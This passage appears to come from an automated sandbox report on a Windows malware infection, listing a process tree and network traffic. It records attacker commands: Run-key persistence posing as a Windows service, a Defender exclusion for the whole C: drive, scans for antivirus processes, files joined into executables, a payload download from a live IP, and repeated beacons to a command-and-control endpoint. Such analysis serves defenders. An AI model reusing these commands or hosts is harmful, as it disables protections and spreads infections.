        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4144
      - C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3884
      - C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe"
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4976
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s
        7⤵
        Modifies registry key
        
        PID:968
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Service 593" /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe\" /f
        7⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:5848
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Microsoft Windows Service 593" /t REG_BINARY /d 020000000000000000000000 /f
        7⤵
        Modifies registry key
        
        PID:8
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunNotification /v "StartupTNotiMicrosoft Windows Service 593" /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:3904
      - C:\Users\Admin\AppData\Local\Temp\10343460101\kZZeUXM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10343460101\kZZeUXM.exe"
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:860
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s
        7⤵
        Modifies registry key
        
        PID:1180
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Service 513" /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Temp\10343460101\kZZeUXM.exe\" /f
        7⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2848
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Microsoft Windows Service 513" /t REG_BINARY /d 020000000000000000000000 /f
        7⤵
        Modifies registry key
        
        PID:6000
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunNotification /v "StartupTNotiMicrosoft Windows Service 513" /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:3580
      - C:\Users\Admin\AppData\Local\Temp\10343470101\kDveTWY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10343470101\kDveTWY.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3324
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4008
      - C:\Users\Admin\AppData\Local\Temp\10343480101\fc9e8f62a2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10343480101\fc9e8f62a2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2604
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4940
      - C:\Users\Admin\AppData\Local\Temp\10343490101\dBSGwVB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10343490101\dBSGwVB.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5436
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:716
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
        8⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:5024
        
        C:\Users\Public\Netstat\bild.exe
        
        C:\Users\Public\Netstat\bild.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3576
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
        8⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3292
        
        C:\Users\Public\Netstat\bild.exe
        
        C:\Users\Public\Netstat\bild.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3236
      - C:\Users\Admin\AppData\Local\Temp\10343500101\WLbfHbp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10343500101\WLbfHbp.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4752
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5844
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3732
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5392
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6120
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1188
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4652
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2108
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "East" Removed
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4072
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:840
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4464
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4744
      - C:\Users\Admin\AppData\Local\Temp\10343510101\f73ae_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10343510101\f73ae_003.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:1476
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3932
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:3340
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:4796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:13068
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:3864
      - C:\Users\Admin\AppData\Local\Temp\10343520101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10343520101\TbV75ZR.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5932
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4932
      - C:\Users\Admin\AppData\Local\Temp\10343530101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10343530101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2168
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:7124
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:11524
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:11540
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:11944
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:11968
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:12152
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:12252
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:12548
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4108
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:12776
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:12956

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5752

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3904

Network

GET

http://176.113.115.7/mine/random.exe

powershell.exe

Remote address:

176.113.115.7:80

Request

GET /mine/random.exe HTTP/1.1
Host: 176.113.115.7
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:36:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 19:51:47 GMT
ETag: "1cc000-631442ae72007"
Accept-Ranges: bytes
Content-Length: 1884160
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5d0e30e632404d7d9dd6b45803bea07a&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5d0e30e632404d7d9dd6b45803bea07a&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=120585DCF2356E1C024D9067F3D56F2F; domain=.bing.com; expires=Mon, 20-Apr-2026 20:36:15 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6F6F0D94F681411791FE1085DB50B965 Ref B: LON04EDGE1208 Ref C: 2025-03-26T20:36:15Z
date: Wed, 26 Mar 2025 20:36:14 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5d0e30e632404d7d9dd6b45803bea07a&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5d0e30e632404d7d9dd6b45803bea07a&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=120585DCF2356E1C024D9067F3D56F2F

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=0AWavoc1zn7NUBlnykGqTPMRcJ7vvJ09E0Bot2w1rZk; domain=.bing.com; expires=Mon, 20-Apr-2026 20:36:15 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2946DEB126554DD886C57012D0E2014C Ref B: LON04EDGE1208 Ref C: 2025-03-26T20:36:15Z
date: Wed, 26 Mar 2025 20:36:14 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5d0e30e632404d7d9dd6b45803bea07a&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5d0e30e632404d7d9dd6b45803bea07a&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=120585DCF2356E1C024D9067F3D56F2F; MSPTC=0AWavoc1zn7NUBlnykGqTPMRcJ7vvJ09E0Bot2w1rZk

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F0EA5D091A4B4A978058EBC04C29BC09 Ref B: LON04EDGE1208 Ref C: 2025-03-26T20:36:15Z
date: Wed, 26 Mar 2025 20:36:15 GMT
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388157_1F8FN0PPBBGQ5O2YF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239339388157_1F8FN0PPBBGQ5O2YF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 732063
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: BABE24BBF9AE4ADF8E8945139A311D39 Ref B: LON04EDGE0615 Ref C: 2025-03-26T20:36:16Z
date: Wed, 26 Mar 2025 20:36:15 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239353582481_1UFRZG7HSKJ6VOM8D&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239353582481_1UFRZG7HSKJ6VOM8D&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 729217
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F2FF5B658BFA426280EF981CE301FBBA Ref B: LON04EDGE0615 Ref C: 2025-03-26T20:36:16Z
date: Wed, 26 Mar 2025 20:36:15 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388158_1XCR56DJ2GD9T3UQ1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239339388158_1XCR56DJ2GD9T3UQ1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 645633
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 76CF9213DF344CADABF629295140085B Ref B: LON04EDGE0615 Ref C: 2025-03-26T20:36:16Z
date: Wed, 26 Mar 2025 20:36:15 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239353582480_11Y0WDW5HLDOO8GP5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239353582480_11Y0WDW5HLDOO8GP5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 679925
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2763E46E3FDA4EECBF26498289DFBBD7 Ref B: LON04EDGE0615 Ref C: 2025-03-26T20:36:16Z
date: Wed, 26 Mar 2025 20:36:15 GMT
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:36:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:36:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:36:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:36:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:37:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:37:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:37:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
